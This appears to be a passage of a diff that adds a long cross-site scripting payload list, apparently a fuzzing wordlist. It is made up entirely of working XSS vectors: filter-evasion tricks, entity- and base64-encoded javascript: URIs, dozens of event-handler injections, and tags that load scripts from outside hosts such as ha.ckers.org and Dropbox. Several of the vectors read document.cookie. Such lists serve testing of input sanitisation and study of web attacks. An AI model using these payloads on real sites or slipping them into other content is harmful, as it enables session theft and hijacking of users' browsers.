+ &lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;
1034
+ &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
1035
+ &lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt;
1036
+ &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;
1037
+ '';!--\"&lt;XSS&gt;=&{()}
1038
+ ';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;
1039
+ ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
1040
+ '';!--"<XSS>=&{()}
1041
+ <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
1042
+ <IMG SRC="javascript:alert('XSS');">
1043
+ <IMG SRC=javascript:alert('XSS')>
1044
+ <IMG SRC=javascrscriptipt:alert('XSS')>
1045
+ <IMG SRC=JaVaScRiPt:alert('XSS')>
1046
+ <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
1047
+ <IMG SRC=" &#14; javascript:alert('XSS');">
1048
+ <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1049
+ <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1050
+ <<SCRIPT>alert("XSS");//<</SCRIPT>
1051
+ <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
1052
+ \";alert('XSS');//
1053
+ </TITLE><SCRIPT>alert("XSS");</SCRIPT>
1054
+ ¼script¾alert(¢XSS¢)¼/script¾
1055
+ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
1056
+ <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
1057
+ <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
1058
+ <TABLE BACKGROUND="javascript:alert('XSS')">
1059
+ <TABLE><TD BACKGROUND="javascript:alert('XSS')">
1060
+ <DIV STYLE="background-image: url(javascript:alert('XSS'))">
1061
+ <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
1062
+ <DIV STYLE="width: expression(alert('XSS'));">
1063
+ <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
1064
+ <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
1065
+ <XSS STYLE="xss:expression(alert('XSS'))">
1066
+ exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
1067
+ <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
1068
+ a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
1069
+ <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
1070
+ <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
1071
+ <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1072
+ <form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
1073
+ <form><button formaction="javascript:alert(123)">crosssitespt
1074
+ <frameset onload=alert(123)>
1075
+ <!--<img src="--><img src=x onerror=alert(123)//">
1076
+ <style><img src="</style><img src=x onerror=alert(123)//">
1077
+ <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
1078
+ <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
1079
+ <embed src="javascript:alert(1)">
1080
+ <? foo="><script>alert(1)</script>">
1081
+ <! foo="><script>alert(1)</script>">
1082
+ </ foo="><script>alert(1)</script>">
1083
+ <script>({0:#0=alert/#0#/#0#(123)})</script>
1084
+ <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
1085
+ <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
1086
+ <script src="#">{alert(1)}</script>;1
1087
+ <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
1088
+ <svg xmlns="#"><script>alert(1)</script></svg>
1089
+ <svg onload="javascript:alert(123)" xmlns="#"></svg>
1090
+ <iframe xmlns="#" src="javascript:alert(1)"></iframe>
1091
+ +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
1092
+ %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
1093
+ +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
1094
+ %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
1095
+ %253cscript%253ealert(document.cookie)%253c/script%253e
1096
+ “><s”%2b”cript>alert(document.cookie)</script>
1097
+ “><ScRiPt>alert(document.cookie)</script>
1098
+ “><<script>alert(document.cookie);//<</script>
1099
+ foo<script>alert(document.cookie)</script>
1100
+ <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
1101
+ %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
1102
+ ‘; alert(document.cookie); var foo=’
1103
+ foo\’; alert(document.cookie);//’;
1104
+ </script><script >alert(document.cookie)</script>
1105
+ <img src=asdf onerror=alert(document.cookie)>
1106
+ <BODY ONLOAD=alert(’XSS’)>
1107
+ <script>alert(1)</script>
1108
+ "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
1109
+ <video src=1 onerror=alert(1)>
1110
+ <audio src=1 onerror=alert(1)>
1111
+ ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
1112
+ '';!--"<XSS>=&{()}
1113
+ 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
1114
+ <script/src=data:,alert()>
1115
+ <marquee/onstart=alert()>
1116
+ <video/poster/onerror=alert()>
1117
+ <isindex/autofocus/onfocus=alert()>
1118
+ <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
1119
+ <IMG SRC="javascript:alert('XSS');">
1120
+ <IMG SRC=javascript:alert('XSS')>
1121
+ <IMG SRC=JaVaScRiPt:alert('XSS')>
1122
+ <IMG SRC=javascript:alert("XSS")>
1123
+ <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
1124
+ <a onmouseover="alert(document.cookie)">xxs link</a>
1125
+ <a onmouseover=alert(document.cookie)>xxs link</a>
1126
+ <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
1127
+ <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
1128
+ <IMG SRC=# onmouseover="alert('xxs')">
1129
+ <IMG SRC= onmouseover="alert('xxs')">
1130
+ <IMG onmouseover="alert('xxs')">
1131
+ <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
1132
+ <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
1133
+ &#39;&#88;&#83;&#83;&#39;&#41;>
1134
+ <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
1135
+ #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
1136
+ <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
1137
+ <IMG SRC="jav ascript:alert('XSS');">
1138
+ <IMG SRC="jav&#x09;ascript:alert('XSS');">
1139
+ <IMG SRC="jav&#x0A;ascript:alert('XSS');">
1140
+ <IMG SRC="jav&#x0D;ascript:alert('XSS');">
1141
+ <IMG SRC=" &#14; javascript:alert('XSS');">
1142
+ <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1143
+ <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
1144
+ <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1145
+ <<SCRIPT>alert("XSS");//<</SCRIPT>
1146
+ <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
1147
+ <SCRIPT SRC=//ha.ckers.org/.j>
1148
+ <IMG SRC="javascript:alert('XSS')"
1149
+ <iframe src=http://ha.ckers.org/scriptlet.html <
1150
+ \";alert('XSS');//
1151
+ </script><script>alert('XSS');</script>
1152
+ </TITLE><SCRIPT>alert("XSS");</SCRIPT>
1153
+ <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
1154
+ <BODY BACKGROUND="javascript:alert('XSS')">
1155
+ <IMG DYNSRC="javascript:alert('XSS')">
1156
+ <IMG LOWSRC="javascript:alert('XSS')">
1157
+ <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
1158
+ <IMG SRC='vbscript:msgbox("XSS")'>
1159
+ <IMG SRC="livescript:[code]">
1160
+ <BODY ONLOAD=alert('XSS')>
1161
+ <BGSOUND SRC="javascript:alert('XSS');">
1162
+ <BR SIZE="&{alert('XSS')}">
1163
+ <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
1164
+ <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
1165
+ <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
1166
+ <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
1167
+ <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
1168
+ <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
1169
+ <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
1170
+ exp/*<A STYLE='no\xss:noxss("*//*");
1171
+ xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
1172
+ <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
1173
+ <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
1174
+ <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
1175
+ <XSS STYLE="xss:expression(alert('XSS'))">
1176
+ <XSS STYLE="behavior: url(xss.htc);">
1177
+ ¼script¾alert(¢XSS¢)¼/script¾
1178
+ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
1179
+ <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
1180
+ <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
1181
+ <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
1182
+ <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
1183
+ <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
1184
+ <TABLE BACKGROUND="javascript:alert('XSS')">
1185
+ <TABLE><TD BACKGROUND="javascript:alert('XSS')">
1186
+ <DIV STYLE="background-image: url(javascript:alert('XSS'))">
1187
+ <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
1188
+ <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
1189
+ <DIV STYLE="width: expression(alert('XSS'));">
1190
+ <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
1191
+ <BASE HREF="javascript:alert('XSS');//">
1192
+ <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
1193
+ <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
1194
+ <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
1195
+ <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
1196
+ <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
1197
+ <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
1198
+ <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1199
+ <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1200
+ <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1201
+ <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1202
+ <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1203
+ <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1204
+ <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1205
+ <A HREF="http://66.102.7.147/">XSS</A>
1206
+ 0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
1207
+ veris-->group<svg/onload=alert(/XSS/)//
1208
+ #"><img src=M onerror=alert('XSS');>
1209
+ element[attribute='<img src=x onerror=alert('XSS');>
1210
+ [<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
1211
+ %22;alert%28%27RVRSH3LL_XSS%29//
1212
+ javascript:alert%281%29;
1213
+ <w contenteditable id=x onfocus=alert()>
1214
+ alert;pg("XSS")
1215
+ <svg/onload=%26%23097lert%26lpar;1337)>
1216
+ <script>for((i)in(self))eval(i)(1)</script>
1217
+ <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
1218
+ <sCR<script>iPt>alert(1)</SCr</script>IPt>
1219
+ <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
1220
+ %253Cscript%253Ealert('XSS')%253C%252Fscript%253E
1221
+ <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
1222
+ <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
1223
+ <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
1224
+ <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
1225
+ <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
1226
+ <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
1227
+ <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
1228
+ <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
1229
+ <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
1230
+ <IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))">
1231
+ <IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))">
1232
+ <IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">
1233
+ <IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">
1234
+ <IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">
1235
+ <IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">
1236
+ <IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">
1237
+ <IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))">
1238
+ <IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))">
1239
+ <IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))">
1240
+ <IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))">
1241
+ <IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))">
1242
+ <IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))">
1243
+ <IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))">
1244
+ <IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))">
1245
+ <IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))">
1246
+ <IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))">
1247
+ <IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))">
1248
+ <IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))">
1249
+ <IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))">
1250
+ <IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))">
1251
+ <IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))">
1252
+ <IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))">
1253
+ <IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))">
1254
+ <IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))">
1255
+ <IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))">
1256
+ <IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))">
1257
+ <IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))">
1258
+ <IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))">
1259
+ <IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))">
1260
+ <IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))">
1261
+ <IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))">
1262
+ <IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))">
1263
+ <IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))">
1264
+ <IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))">
1265
+ <IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))">
1266
+ <IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))">
1267
+ <IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))">
1268
+ <IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))">
1269
+ <IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))">
1270
+ <IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))">
1271
+ <IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))">
1272
+ <IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))">
1273
+ <IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))">
1274
+ <IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))">
1275
+ <IMG SRC=x onended="alert(String.fromCharCode(88,83,83))">
1276
+ <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
1277
+ <IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))">
1278
+ <IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))">
1279
+ <IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))">
1280
+ <IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))">
1281
+ <IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))">
1282
+ <IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))">
1283
+ <IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))">
1284
+ <IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))">
1285
+ <IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))">
1286
+ <IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))">
1287
+ <IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))">
1288
+ <IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))">
1289
+ <IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))">
1290
+ <IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))">
1291
+ <IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))">
1292
+ <IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))">
1293
+ <IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))">
1294
+ <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
1295
+ <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
1296
+ <INPUT TYPE="BUTTON" action="alert('XSS')"/>
1297
+ "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
1298
+ "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
1299
+ <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
1300
+ <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
1301
+ "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
1302
+ "></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF
1303
+ "><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>
1304
+ "><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1>
1305
+ ><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
1306
+ g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
1307
+ <IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME>
1308
+ "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
1309
+ "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
1310
+ <iframe src=http://xss.rocks/scriptlet.html <
1311
+ <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
1312
+ <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
1313
+ <iframe src="&Tab;javascript:prompt(1)&Tab;">
1314
+ <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
1315
+ <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
1316
+ <sVg><scRipt >alert&lpar;1&rpar; {Opera}
1317
+ <img/src=`` onerror=this.onerror=confirm(1)
1318
+ <form><isindex formaction="javascript&colon;confirm(1)"
1319
+ <img src=``&NewLine; onerror=alert(1)&NewLine;
1320
+ <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
1321
+ <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
1322
+ <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
1323
+ <script /**/>/**/alert(1)/**/</script /**/
1324
+ &#34;&#62;<h1/onmouseover='\u0061lert(1)'>
1325
+ <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
1326
+ <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
1327
+ <svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script
1328
+ <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
1329
+ <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
1330
+ <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
1331
+ <form><a href="javascript:\u0061lert&#x28;1&#x29;">X</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
1332
+ <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
1333
+ <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
1334
+ <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
1335
+ http://www.google<script .com>alert(document.location)</script
1336
+ <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
1337
+ <img/src=@&#32;&#13; onerror = prompt('&#49;')
1338
+ <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
1339
+ <script ^__^>alert(String.fromCharCode(49))</script ^__^
1340
+ </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
1341
+ &#00;</form><input type&#61;"date" onfocus="alert(1)">
1342
+ <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
1343
+ <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
1344
+ <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
1345
+ <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
1346
+ <script ~~~>alert(0%0)</script ~~~>
1347
+ <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
1348
+ <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
1349
+ <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
1350
+ &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
1351
+ &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
1352
+ <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
1353
+ <div/style="width:expression(confirm(1))">X</div> {IE7}
1354
+ <iframe// src=javaSCRIPT&colon;alert(1)
1355
+ //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
1356
+ /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
1357
+ //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
1358
+ </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
1359
+ <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
1360
+ </plaintext\></|\><plaintext/onmouseover=prompt(1)
1361
+ </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
1362
+ <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
1363
+ <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
1364
+ <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
1365
+ <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
1366
+ <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
1367
+ <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
1368
+ <var onmouseover="prompt(1)">On Mouse Over</var>
1369
+ <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
1370
+ <img src="/" =_=" title="onerror='prompt(1)'">
1371
+ <%<!--'%><script>alert(1);</script -->
1372
+ <script src="data:text/javascript,alert(1)"></script>
1373
+ <iframe/src \/\/onload = prompt(1)
1374
+ <iframe/onreadystatechange=alert(1)
1375
+ <svg/onload=alert(1)
1376
+ <input value=<><iframe/src=javascript:confirm(1)
1377
+ <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
1378
+ http://www.<script>alert(1)</script .com
1379
+ <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&N